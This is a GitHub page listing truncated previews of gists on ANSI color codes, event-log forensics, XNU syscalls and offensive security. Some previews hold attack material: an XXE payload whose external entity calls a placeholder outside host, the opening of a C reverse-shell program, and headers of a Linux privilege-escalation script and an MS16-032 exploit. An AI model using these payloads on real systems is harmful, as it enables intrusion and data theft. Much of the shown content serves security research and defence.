Skip to content

Instantly share code, notes, and snippets.

View ewilded's full-sized avatar
🌴
On vacation

Julian Horoszkiewicz ewilded

🌴
On vacation
193 followers · 67 following
View GitHub Profile
@iamnewton
iamnewton / bash-colors.md
Last active December 20, 2024 16:32
The entire table of ANSI color codes.

Regular Colors

Value Color
\e[0;30m Black
\e[0;31m Red
\e[0;32m Green
\e[0;33m Yellow
\e[0;34m Blue
\e[0;35m Purple
@mchow01
mchow01 / mongodb_injection_nodejs.txt
Last active December 12, 2021 23:27
MongoDB Request Injection Attack in Node.js + Express Web Applications
Overview
========
Students in my Web Programming class (G. Brown, S. Prassad, et al)
discovered that MongoDB request injection attacks also work on Node.js
+ Express web applications. MongoDB request injection attacks have
been known for PHP web applications.
Impact
======
Attacker can view and download all the data in a MongoDB database
@staaldraad
staaldraad / XXE_payloads
Last active October 8, 2024 15:20
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@0xabe-io
0xabe-io / reverse_shell.c
Created January 6, 2015 15:24
Simple C code to create a reverse shell
/* credits to http://blog.techorganic.com/2015/01/04/pegasus-hacking-challenge/ */
#include <stdio.h>
#include <unistd.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#define REMOTE_ADDR "XXX.XXX.XXX.XXX"
#define REMOTE_PORT XXX
@exp0se
exp0se / powershell_eventlog_parsing.ps1
Last active October 21, 2024 18:26
Powershell log parsing
#Security log
#============
####
#4624 - Logon & Logoff events successful
#4625 - Logon unsucceful
####
# Get usernames
Get-WinEvent -path .\Security.evtx | Where {$_.id -eq "4624"} | Foreach {([xml]$_.ToXml()).GetElementsByTagName("Data").ItemOf(5)}| Select -ExpandProperty "#text" -Unique
# Get domains
@exp0se
exp0se / logparser.ps1
Created March 13, 2016 09:22
Logparser log parsing
# Logparser
###############
# Security Log
###############
# Find Event id
& 'C:\Program Files (x86)\Log Parser 2.2\LogParser.exe' -stats:OFF -i:EVT "SELECT * FROM 'Security.evtx' WHERE EventID = '5038'"
@yrp604
yrp604 / xnu-syscall-life-amd64.md
Last active October 2, 2023 15:59
The life of an XNU unix syscall on amd64

XNU syscall path

Chart

             +------------------+
             |These push their  |                                  +-----------------------+
             |respective syscall|                                  |This overwrites the    |
             |dispatch functions|                                  |saved dispatch function|
             |onto the stack    |                                  |with hndl_alltraps     |
@1N3
1N3 / LinuxPrivEsc.sh
Created May 13, 2016 02:50
Linux Privilege Escalation Script by 1N3 @CrowdShield - https://crowdshield.com
#!/bin/sh
#
# `7MN. `7MF'
# __, MMN. M
#`7MM M YMb M pd""b.
# MM M `MN. M (O) `8b
# MM M `MM.M ,89
# MM M YMM ""Yb.
#.JMML..JML. YM 88
# (O) .M'
@ssherei
ssherei / Modified-MS16-032.ps1
Created June 1, 2016 14:35
function Invoke-MS16-032 {
<#
.SYNOPSIS
PowerShell implementation of MS16-032. The exploit targets all vulnerable
operating systems that support PowerShell v2+. Credit for the discovery of
the bug and the logic to exploit it go to James Forshaw (@tiraniddo).
Targets:
@mgeeky
mgeeky / Procmon_operationst.txt
Last active November 5, 2024 22:16
PROCMON Operations list
CloseFile
CreateFile
CreateFileMapping
DeviceIoControl
FileSystemControl
FlushBuffersFile
Load Image
LockFile
NotifyChangeDirectory
Process Create